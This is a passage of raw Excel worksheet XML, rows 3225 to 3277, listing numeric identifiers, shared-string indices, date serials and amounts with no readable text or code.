    <row r="3225" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3225">
        <v>23233</v>
      </c>
      <c r="B3225">
        <v>5095</v>
      </c>
      <c r="C3225" t="s">
        <v>8043</v>
      </c>
      <c r="D3225" t="s">
        <v>12519</v>
      </c>
      <c r="E3225">
        <v>11</v>
      </c>
      <c r="F3225" t="s">
        <v>5434</v>
      </c>
      <c r="G3225" s="1">
        <v>44200</v>
      </c>
      <c r="H3225">
        <v>1000</v>
      </c>
      <c r="J3225" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="3226" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3226">
        <v>23234</v>
      </c>
      <c r="B3226">
        <v>5095</v>
      </c>
      <c r="C3226" t="s">
        <v>8043</v>
      </c>
      <c r="D3226" t="s">
        <v>12519</v>
      </c>
      <c r="E3226">
        <v>11</v>
      </c>
      <c r="F3226" t="s">
        <v>7613</v>
      </c>
      <c r="G3226" s="1">
        <v>44200</v>
      </c>
      <c r="H3226">
        <v>1000</v>
      </c>
      <c r="J3226" t="s">
        <v>10497</v>
      </c>
    </row>
    <row r="3227" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3227">
        <v>23235</v>
      </c>
      <c r="B3227">
        <v>5095</v>
      </c>
      <c r="C3227" t="s">
        <v>8043</v>
      </c>
      <c r="D3227" t="s">
        <v>12519</v>
      </c>
      <c r="E3227">
        <v>11</v>
      </c>
      <c r="F3227" t="s">
        <v>512</v>
      </c>
      <c r="G3227" s="1">
        <v>44200</v>
      </c>
      <c r="H3227">
        <v>1000</v>
      </c>
      <c r="J3227" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3228" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3228">
        <v>23236</v>
      </c>
      <c r="B3228">
        <v>597</v>
      </c>
      <c r="C3228" t="s">
        <v>16482</v>
      </c>
      <c r="D3228" t="s">
        <v>16483</v>
      </c>
      <c r="E3228">
        <v>13</v>
      </c>
      <c r="F3228" t="s">
        <v>12520</v>
      </c>
      <c r="G3228" s="1">
        <v>44207</v>
      </c>
      <c r="H3228" s="4">
        <v>9600</v>
      </c>
      <c r="I3228" t="s">
        <v>12521</v>
      </c>
    </row>
    <row r="3229" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3229">
        <v>23238</v>
      </c>
      <c r="B3229">
        <v>5083</v>
      </c>
      <c r="C3229" t="s">
        <v>7970</v>
      </c>
      <c r="D3229" t="s">
        <v>12522</v>
      </c>
      <c r="E3229">
        <v>5</v>
      </c>
      <c r="F3229" t="s">
        <v>12523</v>
      </c>
      <c r="G3229" s="1">
        <v>44162</v>
      </c>
      <c r="H3229">
        <v>480</v>
      </c>
      <c r="I3229" t="s">
        <v>9638</v>
      </c>
      <c r="J3229" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3230" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3230">
        <v>23241</v>
      </c>
      <c r="B3230">
        <v>5113</v>
      </c>
      <c r="C3230" t="s">
        <v>8078</v>
      </c>
      <c r="D3230" t="s">
        <v>12524</v>
      </c>
      <c r="E3230">
        <v>16</v>
      </c>
      <c r="F3230" t="s">
        <v>12525</v>
      </c>
      <c r="G3230" s="1">
        <v>44194</v>
      </c>
      <c r="H3230">
        <v>200</v>
      </c>
      <c r="I3230" t="s">
        <v>12526</v>
      </c>
    </row>
    <row r="3231" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3231">
        <v>23242</v>
      </c>
      <c r="B3231">
        <v>5113</v>
      </c>
      <c r="C3231" t="s">
        <v>8078</v>
      </c>
      <c r="D3231" t="s">
        <v>12524</v>
      </c>
      <c r="E3231">
        <v>16</v>
      </c>
      <c r="F3231" t="s">
        <v>12527</v>
      </c>
      <c r="G3231" s="1">
        <v>44194</v>
      </c>
      <c r="H3231">
        <v>500</v>
      </c>
      <c r="I3231" t="s">
        <v>12526</v>
      </c>
    </row>
    <row r="3232" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3232">
        <v>23243</v>
      </c>
      <c r="B3232">
        <v>5113</v>
      </c>
      <c r="C3232" t="s">
        <v>8078</v>
      </c>
      <c r="D3232" t="s">
        <v>12524</v>
      </c>
      <c r="E3232">
        <v>16</v>
      </c>
      <c r="F3232" t="s">
        <v>3341</v>
      </c>
      <c r="G3232" s="1">
        <v>44194</v>
      </c>
      <c r="H3232">
        <v>500</v>
      </c>
      <c r="I3232" t="s">
        <v>12528</v>
      </c>
    </row>
    <row r="3233" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3233">
        <v>23246</v>
      </c>
      <c r="B3233">
        <v>5113</v>
      </c>
      <c r="C3233" t="s">
        <v>8078</v>
      </c>
      <c r="D3233" t="s">
        <v>12524</v>
      </c>
      <c r="E3233">
        <v>16</v>
      </c>
      <c r="F3233" t="s">
        <v>12529</v>
      </c>
      <c r="G3233" s="1">
        <v>44194</v>
      </c>
      <c r="H3233">
        <v>1000</v>
      </c>
      <c r="I3233" t="s">
        <v>12528</v>
      </c>
    </row>
    <row r="3234" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3234">
        <v>23253</v>
      </c>
      <c r="B3234">
        <v>5114</v>
      </c>
      <c r="C3234" t="s">
        <v>8100</v>
      </c>
      <c r="D3234" t="s">
        <v>12530</v>
      </c>
      <c r="E3234">
        <v>16</v>
      </c>
      <c r="F3234" t="s">
        <v>12531</v>
      </c>
      <c r="G3234" s="1">
        <v>44280</v>
      </c>
      <c r="H3234">
        <v>1000</v>
      </c>
      <c r="I3234" t="s">
        <v>12532</v>
      </c>
    </row>
    <row r="3235" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3235">
        <v>23254</v>
      </c>
      <c r="B3235">
        <v>2738</v>
      </c>
      <c r="C3235" t="s">
        <v>7229</v>
      </c>
      <c r="D3235" t="s">
        <v>11476</v>
      </c>
      <c r="E3235">
        <v>16</v>
      </c>
      <c r="F3235" t="s">
        <v>12533</v>
      </c>
      <c r="G3235" s="1">
        <v>44211</v>
      </c>
      <c r="H3235">
        <v>2000</v>
      </c>
      <c r="I3235" t="s">
        <v>11478</v>
      </c>
    </row>
    <row r="3236" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3236">
        <v>23255</v>
      </c>
      <c r="B3236">
        <v>2738</v>
      </c>
      <c r="C3236" t="s">
        <v>7229</v>
      </c>
      <c r="D3236" t="s">
        <v>11476</v>
      </c>
      <c r="E3236">
        <v>16</v>
      </c>
      <c r="F3236" t="s">
        <v>7241</v>
      </c>
      <c r="G3236" s="1">
        <v>44211</v>
      </c>
      <c r="H3236">
        <v>500</v>
      </c>
      <c r="I3236" t="s">
        <v>11478</v>
      </c>
    </row>
    <row r="3237" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3237">
        <v>23256</v>
      </c>
      <c r="B3237">
        <v>2738</v>
      </c>
      <c r="C3237" t="s">
        <v>7229</v>
      </c>
      <c r="D3237" t="s">
        <v>11476</v>
      </c>
      <c r="E3237">
        <v>16</v>
      </c>
      <c r="F3237" t="s">
        <v>9437</v>
      </c>
      <c r="G3237" s="1">
        <v>44211</v>
      </c>
      <c r="H3237">
        <v>2000</v>
      </c>
      <c r="I3237" t="s">
        <v>11478</v>
      </c>
    </row>
    <row r="3238" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3238">
        <v>23259</v>
      </c>
      <c r="B3238">
        <v>1215</v>
      </c>
      <c r="C3238" t="s">
        <v>3879</v>
      </c>
      <c r="D3238" t="s">
        <v>12534</v>
      </c>
      <c r="E3238">
        <v>14</v>
      </c>
      <c r="F3238" t="s">
        <v>9472</v>
      </c>
      <c r="G3238" s="1">
        <v>44279</v>
      </c>
      <c r="H3238">
        <v>120000</v>
      </c>
      <c r="J3238" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3239" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3239">
        <v>23260</v>
      </c>
      <c r="B3239">
        <v>1215</v>
      </c>
      <c r="C3239" t="s">
        <v>3879</v>
      </c>
      <c r="D3239" t="s">
        <v>12534</v>
      </c>
      <c r="E3239">
        <v>14</v>
      </c>
      <c r="F3239" t="s">
        <v>12535</v>
      </c>
      <c r="G3239" s="1">
        <v>44279</v>
      </c>
      <c r="H3239">
        <v>50000</v>
      </c>
      <c r="J3239" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="3240" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3240">
        <v>23261</v>
      </c>
      <c r="B3240">
        <v>5070</v>
      </c>
      <c r="C3240" t="s">
        <v>6511</v>
      </c>
      <c r="D3240" t="s">
        <v>12536</v>
      </c>
      <c r="E3240">
        <v>12</v>
      </c>
      <c r="F3240" t="s">
        <v>8109</v>
      </c>
      <c r="G3240" s="1">
        <v>44194</v>
      </c>
      <c r="H3240">
        <v>170000</v>
      </c>
      <c r="J3240" t="s">
        <v>12537</v>
      </c>
    </row>
    <row r="3241" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3241">
        <v>23269</v>
      </c>
      <c r="B3241">
        <v>796</v>
      </c>
      <c r="C3241" t="s">
        <v>467</v>
      </c>
      <c r="D3241" t="s">
        <v>12538</v>
      </c>
      <c r="E3241">
        <v>2</v>
      </c>
      <c r="F3241" t="s">
        <v>7901</v>
      </c>
      <c r="G3241" s="1">
        <v>44181</v>
      </c>
      <c r="H3241">
        <v>850000</v>
      </c>
      <c r="J3241" t="s">
        <v>12539</v>
      </c>
    </row>
    <row r="3242" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3242">
        <v>23271</v>
      </c>
      <c r="B3242">
        <v>5123</v>
      </c>
      <c r="C3242" t="s">
        <v>5899</v>
      </c>
      <c r="D3242" t="s">
        <v>10954</v>
      </c>
      <c r="E3242">
        <v>25</v>
      </c>
      <c r="F3242" t="s">
        <v>3763</v>
      </c>
      <c r="G3242" s="1">
        <v>44160</v>
      </c>
      <c r="H3242">
        <v>0</v>
      </c>
      <c r="I3242" t="s">
        <v>9550</v>
      </c>
      <c r="J3242" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3243" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3243">
        <v>23272</v>
      </c>
      <c r="B3243">
        <v>1200</v>
      </c>
      <c r="C3243" t="s">
        <v>3895</v>
      </c>
      <c r="D3243" t="s">
        <v>12540</v>
      </c>
      <c r="E3243">
        <v>12</v>
      </c>
      <c r="F3243" t="s">
        <v>2924</v>
      </c>
      <c r="G3243" s="1">
        <v>44200</v>
      </c>
      <c r="H3243">
        <v>400000</v>
      </c>
      <c r="I3243" t="s">
        <v>12541</v>
      </c>
    </row>
    <row r="3244" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3244">
        <v>23273</v>
      </c>
      <c r="B3244">
        <v>1200</v>
      </c>
      <c r="C3244" t="s">
        <v>3895</v>
      </c>
      <c r="D3244" t="s">
        <v>12540</v>
      </c>
      <c r="E3244">
        <v>12</v>
      </c>
      <c r="F3244" t="s">
        <v>9561</v>
      </c>
      <c r="G3244" s="1">
        <v>44200</v>
      </c>
      <c r="H3244">
        <v>0</v>
      </c>
      <c r="I3244" t="s">
        <v>12542</v>
      </c>
    </row>
    <row r="3245" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3245">
        <v>23274</v>
      </c>
      <c r="B3245">
        <v>1200</v>
      </c>
      <c r="C3245" t="s">
        <v>3895</v>
      </c>
      <c r="D3245" t="s">
        <v>12540</v>
      </c>
      <c r="E3245">
        <v>12</v>
      </c>
      <c r="F3245" t="s">
        <v>12543</v>
      </c>
      <c r="G3245" s="1">
        <v>44200</v>
      </c>
      <c r="H3245">
        <v>0</v>
      </c>
      <c r="I3245" t="s">
        <v>12544</v>
      </c>
    </row>
    <row r="3246" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3246">
        <v>23275</v>
      </c>
      <c r="B3246">
        <v>1200</v>
      </c>
      <c r="C3246" t="s">
        <v>3895</v>
      </c>
      <c r="D3246" t="s">
        <v>12540</v>
      </c>
      <c r="E3246">
        <v>12</v>
      </c>
      <c r="F3246" t="s">
        <v>9438</v>
      </c>
      <c r="G3246" s="1">
        <v>44200</v>
      </c>
      <c r="H3246">
        <v>0</v>
      </c>
      <c r="I3246" t="s">
        <v>12545</v>
      </c>
    </row>
    <row r="3247" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3247">
        <v>23276</v>
      </c>
      <c r="B3247">
        <v>1200</v>
      </c>
      <c r="C3247" t="s">
        <v>3895</v>
      </c>
      <c r="D3247" t="s">
        <v>12540</v>
      </c>
      <c r="E3247">
        <v>12</v>
      </c>
      <c r="F3247" t="s">
        <v>9941</v>
      </c>
      <c r="G3247" s="1">
        <v>44200</v>
      </c>
      <c r="H3247">
        <v>0</v>
      </c>
      <c r="I3247" t="s">
        <v>12546</v>
      </c>
    </row>
    <row r="3248" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3248">
        <v>23277</v>
      </c>
      <c r="B3248">
        <v>1200</v>
      </c>
      <c r="C3248" t="s">
        <v>3895</v>
      </c>
      <c r="D3248" t="s">
        <v>12540</v>
      </c>
      <c r="E3248">
        <v>12</v>
      </c>
      <c r="F3248" t="s">
        <v>8913</v>
      </c>
      <c r="G3248" s="1">
        <v>44200</v>
      </c>
      <c r="H3248">
        <v>0</v>
      </c>
      <c r="I3248" t="s">
        <v>12547</v>
      </c>
    </row>
    <row r="3249" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3249">
        <v>23278</v>
      </c>
      <c r="B3249">
        <v>5116</v>
      </c>
      <c r="C3249" t="s">
        <v>8139</v>
      </c>
      <c r="D3249" t="s">
        <v>12548</v>
      </c>
      <c r="E3249">
        <v>16</v>
      </c>
      <c r="F3249" t="s">
        <v>8141</v>
      </c>
      <c r="G3249" s="1">
        <v>44334</v>
      </c>
      <c r="H3249">
        <v>180000</v>
      </c>
      <c r="I3249" t="s">
        <v>12549</v>
      </c>
    </row>
    <row r="3250" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3250">
        <v>23284</v>
      </c>
      <c r="B3250">
        <v>5145</v>
      </c>
      <c r="C3250" t="s">
        <v>8135</v>
      </c>
      <c r="D3250" t="s">
        <v>12550</v>
      </c>
      <c r="E3250">
        <v>16</v>
      </c>
      <c r="F3250" t="s">
        <v>12551</v>
      </c>
      <c r="G3250" s="1">
        <v>44194</v>
      </c>
      <c r="H3250">
        <v>40000</v>
      </c>
      <c r="I3250" t="s">
        <v>12552</v>
      </c>
      <c r="J3250" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="3251" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3251">
        <v>23285</v>
      </c>
      <c r="B3251">
        <v>5145</v>
      </c>
      <c r="C3251" t="s">
        <v>8135</v>
      </c>
      <c r="D3251" t="s">
        <v>12550</v>
      </c>
      <c r="E3251">
        <v>16</v>
      </c>
      <c r="F3251" t="s">
        <v>9437</v>
      </c>
      <c r="G3251" s="1">
        <v>44194</v>
      </c>
      <c r="H3251">
        <v>100000</v>
      </c>
      <c r="I3251" t="s">
        <v>12553</v>
      </c>
      <c r="J3251" t="s">
        <v>12554</v>
      </c>
    </row>
    <row r="3252" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3252">
        <v>23286</v>
      </c>
      <c r="B3252">
        <v>5145</v>
      </c>
      <c r="C3252" t="s">
        <v>8135</v>
      </c>
      <c r="D3252" t="s">
        <v>12550</v>
      </c>
      <c r="E3252">
        <v>16</v>
      </c>
      <c r="F3252" t="s">
        <v>12555</v>
      </c>
      <c r="G3252" s="1">
        <v>44194</v>
      </c>
      <c r="H3252">
        <v>240000</v>
      </c>
      <c r="I3252" t="s">
        <v>12556</v>
      </c>
      <c r="J3252" t="s">
        <v>12557</v>
      </c>
    </row>
    <row r="3253" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3253">
        <v>23297</v>
      </c>
      <c r="B3253">
        <v>1611</v>
      </c>
      <c r="C3253" t="s">
        <v>16484</v>
      </c>
      <c r="D3253" t="s">
        <v>16485</v>
      </c>
      <c r="E3253">
        <v>16</v>
      </c>
      <c r="F3253" t="s">
        <v>10690</v>
      </c>
      <c r="G3253" s="1">
        <v>44183</v>
      </c>
      <c r="H3253" s="4">
        <v>300000</v>
      </c>
      <c r="J3253" t="s">
        <v>10936</v>
      </c>
    </row>
    <row r="3254" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3254">
        <v>23298</v>
      </c>
      <c r="B3254">
        <v>1611</v>
      </c>
      <c r="C3254" t="s">
        <v>16484</v>
      </c>
      <c r="D3254" t="s">
        <v>16485</v>
      </c>
      <c r="E3254">
        <v>16</v>
      </c>
      <c r="F3254" t="s">
        <v>10879</v>
      </c>
      <c r="G3254" s="1">
        <v>44183</v>
      </c>
      <c r="H3254" s="4">
        <v>500000</v>
      </c>
      <c r="J3254" t="s">
        <v>10936</v>
      </c>
    </row>
    <row r="3255" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3255">
        <v>23299</v>
      </c>
      <c r="B3255">
        <v>5095</v>
      </c>
      <c r="C3255" t="s">
        <v>8043</v>
      </c>
      <c r="D3255" t="s">
        <v>12519</v>
      </c>
      <c r="E3255">
        <v>11</v>
      </c>
      <c r="F3255" t="s">
        <v>12158</v>
      </c>
      <c r="G3255" s="1">
        <v>44200</v>
      </c>
      <c r="H3255">
        <v>10000</v>
      </c>
      <c r="J3255" t="s">
        <v>12558</v>
      </c>
    </row>
    <row r="3256" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3256">
        <v>23300</v>
      </c>
      <c r="B3256">
        <v>5075</v>
      </c>
      <c r="C3256" t="s">
        <v>7956</v>
      </c>
      <c r="D3256" t="s">
        <v>12559</v>
      </c>
      <c r="E3256">
        <v>26</v>
      </c>
      <c r="F3256" t="s">
        <v>364</v>
      </c>
      <c r="G3256" s="1">
        <v>44168</v>
      </c>
      <c r="H3256">
        <v>500000</v>
      </c>
      <c r="I3256" t="s">
        <v>12560</v>
      </c>
      <c r="J3256" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="3257" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3257">
        <v>23301</v>
      </c>
      <c r="B3257">
        <v>5010</v>
      </c>
      <c r="C3257" t="s">
        <v>7983</v>
      </c>
      <c r="D3257" t="s">
        <v>11717</v>
      </c>
      <c r="E3257">
        <v>11</v>
      </c>
      <c r="F3257" t="s">
        <v>764</v>
      </c>
      <c r="G3257" s="1">
        <v>44160</v>
      </c>
      <c r="H3257">
        <v>10000</v>
      </c>
      <c r="J3257" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3258" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3258">
        <v>23302</v>
      </c>
      <c r="B3258">
        <v>2861</v>
      </c>
      <c r="C3258" t="s">
        <v>8049</v>
      </c>
      <c r="D3258" t="s">
        <v>12561</v>
      </c>
      <c r="E3258">
        <v>14</v>
      </c>
      <c r="F3258" t="s">
        <v>12562</v>
      </c>
      <c r="G3258" s="1">
        <v>44172</v>
      </c>
      <c r="H3258">
        <v>1000000</v>
      </c>
      <c r="I3258" t="s">
        <v>12563</v>
      </c>
    </row>
    <row r="3259" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3259">
        <v>23303</v>
      </c>
      <c r="B3259">
        <v>2036</v>
      </c>
      <c r="C3259" t="s">
        <v>6184</v>
      </c>
      <c r="D3259" t="s">
        <v>12564</v>
      </c>
      <c r="E3259">
        <v>2</v>
      </c>
      <c r="F3259" t="s">
        <v>9527</v>
      </c>
      <c r="G3259" s="1">
        <v>44176</v>
      </c>
      <c r="H3259">
        <v>300000</v>
      </c>
      <c r="I3259" t="s">
        <v>9603</v>
      </c>
      <c r="J3259" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3260" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3260">
        <v>23304</v>
      </c>
      <c r="B3260">
        <v>2036</v>
      </c>
      <c r="C3260" t="s">
        <v>6184</v>
      </c>
      <c r="D3260" t="s">
        <v>12564</v>
      </c>
      <c r="E3260">
        <v>2</v>
      </c>
      <c r="F3260" t="s">
        <v>9928</v>
      </c>
      <c r="G3260" s="1">
        <v>44176</v>
      </c>
      <c r="H3260">
        <v>300000</v>
      </c>
      <c r="I3260" t="s">
        <v>9603</v>
      </c>
      <c r="J3260" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3261" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3261">
        <v>23305</v>
      </c>
      <c r="B3261">
        <v>2036</v>
      </c>
      <c r="C3261" t="s">
        <v>6184</v>
      </c>
      <c r="D3261" t="s">
        <v>12564</v>
      </c>
      <c r="E3261">
        <v>2</v>
      </c>
      <c r="F3261" t="s">
        <v>3814</v>
      </c>
      <c r="G3261" s="1">
        <v>44176</v>
      </c>
      <c r="H3261">
        <v>300000</v>
      </c>
      <c r="I3261" t="s">
        <v>9603</v>
      </c>
      <c r="J3261" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3262" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3262">
        <v>23306</v>
      </c>
      <c r="B3262">
        <v>2036</v>
      </c>
      <c r="C3262" t="s">
        <v>6184</v>
      </c>
      <c r="D3262" t="s">
        <v>12564</v>
      </c>
      <c r="E3262">
        <v>2</v>
      </c>
      <c r="F3262" t="s">
        <v>12565</v>
      </c>
      <c r="G3262" s="1">
        <v>44176</v>
      </c>
      <c r="H3262">
        <v>300000</v>
      </c>
      <c r="I3262" t="s">
        <v>9603</v>
      </c>
      <c r="J3262" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3263" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3263">
        <v>23308</v>
      </c>
      <c r="B3263">
        <v>2036</v>
      </c>
      <c r="C3263" t="s">
        <v>6184</v>
      </c>
      <c r="D3263" t="s">
        <v>12564</v>
      </c>
      <c r="E3263">
        <v>2</v>
      </c>
      <c r="F3263" t="s">
        <v>12566</v>
      </c>
      <c r="G3263" s="1">
        <v>44176</v>
      </c>
      <c r="H3263">
        <v>300000</v>
      </c>
      <c r="I3263" t="s">
        <v>9603</v>
      </c>
      <c r="J3263" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3264" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3264">
        <v>23309</v>
      </c>
      <c r="B3264">
        <v>2036</v>
      </c>
      <c r="C3264" t="s">
        <v>6184</v>
      </c>
      <c r="D3264" t="s">
        <v>12564</v>
      </c>
      <c r="E3264">
        <v>2</v>
      </c>
      <c r="F3264" t="s">
        <v>7901</v>
      </c>
      <c r="G3264" s="1">
        <v>44176</v>
      </c>
      <c r="H3264">
        <v>300000</v>
      </c>
      <c r="I3264" t="s">
        <v>9603</v>
      </c>
      <c r="J3264" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="3265" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3265">
        <v>23310</v>
      </c>
      <c r="B3265">
        <v>2036</v>
      </c>
      <c r="C3265" t="s">
        <v>6184</v>
      </c>
      <c r="D3265" t="s">
        <v>12564</v>
      </c>
      <c r="E3265">
        <v>2</v>
      </c>
      <c r="F3265" t="s">
        <v>11988</v>
      </c>
      <c r="G3265" s="1">
        <v>44176</v>
      </c>
      <c r="H3265">
        <v>300000</v>
      </c>
      <c r="I3265" t="s">
        <v>9603</v>
      </c>
      <c r="J3265" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="3266" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3266">
        <v>23311</v>
      </c>
      <c r="B3266">
        <v>2036</v>
      </c>
      <c r="C3266" t="s">
        <v>6184</v>
      </c>
      <c r="D3266" t="s">
        <v>12564</v>
      </c>
      <c r="E3266">
        <v>2</v>
      </c>
      <c r="F3266" t="s">
        <v>1030</v>
      </c>
      <c r="G3266" s="1">
        <v>44176</v>
      </c>
      <c r="H3266">
        <v>300000</v>
      </c>
      <c r="I3266" t="s">
        <v>9603</v>
      </c>
      <c r="J3266" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="3267" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3267">
        <v>23319</v>
      </c>
      <c r="B3267">
        <v>660</v>
      </c>
      <c r="C3267" t="s">
        <v>16448</v>
      </c>
      <c r="D3267" t="s">
        <v>16449</v>
      </c>
      <c r="E3267">
        <v>16</v>
      </c>
      <c r="F3267" t="s">
        <v>12568</v>
      </c>
      <c r="G3267" s="1">
        <v>44232</v>
      </c>
      <c r="H3267" s="4">
        <v>4000</v>
      </c>
      <c r="J3267" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3268" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3268">
        <v>23322</v>
      </c>
      <c r="B3268">
        <v>1275</v>
      </c>
      <c r="C3268" t="s">
        <v>2914</v>
      </c>
      <c r="D3268" t="s">
        <v>10564</v>
      </c>
      <c r="E3268">
        <v>26</v>
      </c>
      <c r="F3268" t="s">
        <v>9900</v>
      </c>
      <c r="G3268" s="1">
        <v>44216</v>
      </c>
      <c r="H3268">
        <v>55000</v>
      </c>
      <c r="J3268" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3269" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3269">
        <v>23323</v>
      </c>
      <c r="B3269">
        <v>1275</v>
      </c>
      <c r="C3269" t="s">
        <v>2914</v>
      </c>
      <c r="D3269" t="s">
        <v>10564</v>
      </c>
      <c r="E3269">
        <v>26</v>
      </c>
      <c r="F3269" t="s">
        <v>12569</v>
      </c>
      <c r="G3269" s="1">
        <v>44216</v>
      </c>
      <c r="H3269">
        <v>65000</v>
      </c>
      <c r="J3269" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3270" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3270">
        <v>23324</v>
      </c>
      <c r="B3270">
        <v>1275</v>
      </c>
      <c r="C3270" t="s">
        <v>2914</v>
      </c>
      <c r="D3270" t="s">
        <v>10564</v>
      </c>
      <c r="E3270">
        <v>26</v>
      </c>
      <c r="F3270" t="s">
        <v>12570</v>
      </c>
      <c r="G3270" s="1">
        <v>44216</v>
      </c>
      <c r="H3270">
        <v>0</v>
      </c>
      <c r="J3270" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3271" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3271">
        <v>23325</v>
      </c>
      <c r="B3271">
        <v>1275</v>
      </c>
      <c r="C3271" t="s">
        <v>16486</v>
      </c>
      <c r="D3271" t="s">
        <v>16487</v>
      </c>
      <c r="E3271">
        <v>26</v>
      </c>
      <c r="F3271" t="s">
        <v>12571</v>
      </c>
      <c r="G3271" s="1">
        <v>44216</v>
      </c>
      <c r="H3271" s="3" t="s">
        <v>16271</v>
      </c>
      <c r="J3271" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3272" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3272">
        <v>23326</v>
      </c>
      <c r="B3272">
        <v>1275</v>
      </c>
      <c r="C3272" t="s">
        <v>2914</v>
      </c>
      <c r="D3272" t="s">
        <v>10564</v>
      </c>
      <c r="E3272">
        <v>26</v>
      </c>
      <c r="F3272" t="s">
        <v>12572</v>
      </c>
      <c r="G3272" s="1">
        <v>44216</v>
      </c>
      <c r="H3272">
        <v>0</v>
      </c>
      <c r="J3272" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3273" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3273">
        <v>23327</v>
      </c>
      <c r="B3273">
        <v>1275</v>
      </c>
      <c r="C3273" t="s">
        <v>2914</v>
      </c>
      <c r="D3273" t="s">
        <v>10564</v>
      </c>
      <c r="E3273">
        <v>26</v>
      </c>
      <c r="F3273" t="s">
        <v>2236</v>
      </c>
      <c r="G3273" s="1">
        <v>44216</v>
      </c>
      <c r="H3273">
        <v>0</v>
      </c>
      <c r="J3273" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3274" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3274">
        <v>23328</v>
      </c>
      <c r="B3274">
        <v>1275</v>
      </c>
      <c r="C3274" t="s">
        <v>2914</v>
      </c>
      <c r="D3274" t="s">
        <v>10564</v>
      </c>
      <c r="E3274">
        <v>26</v>
      </c>
      <c r="F3274" t="s">
        <v>4686</v>
      </c>
      <c r="G3274" s="1">
        <v>44216</v>
      </c>
      <c r="H3274">
        <v>0</v>
      </c>
    </row>
    <row r="3275" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3275">
        <v>23332</v>
      </c>
      <c r="B3275">
        <v>2106</v>
      </c>
      <c r="C3275" t="s">
        <v>16488</v>
      </c>
      <c r="D3275" t="s">
        <v>16489</v>
      </c>
      <c r="E3275">
        <v>29</v>
      </c>
      <c r="F3275" t="s">
        <v>12573</v>
      </c>
      <c r="G3275" s="1">
        <v>44181</v>
      </c>
      <c r="H3275" s="4">
        <v>500000</v>
      </c>
    </row>
    <row r="3276" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3276">
        <v>23333</v>
      </c>
      <c r="B3276">
        <v>4965</v>
      </c>
      <c r="C3276" t="s">
        <v>7988</v>
      </c>
      <c r="D3276" t="s">
        <v>12459</v>
      </c>
      <c r="E3276">
        <v>12</v>
      </c>
      <c r="F3276" t="s">
        <v>1746</v>
      </c>
      <c r="G3276" s="1">
        <v>44168</v>
      </c>
      <c r="H3276">
        <v>50000</v>
      </c>
      <c r="I3276" t="s">
        <v>10442</v>
      </c>
      <c r="J3276" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3277" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3277">
        <v>23334</v>
      </c>
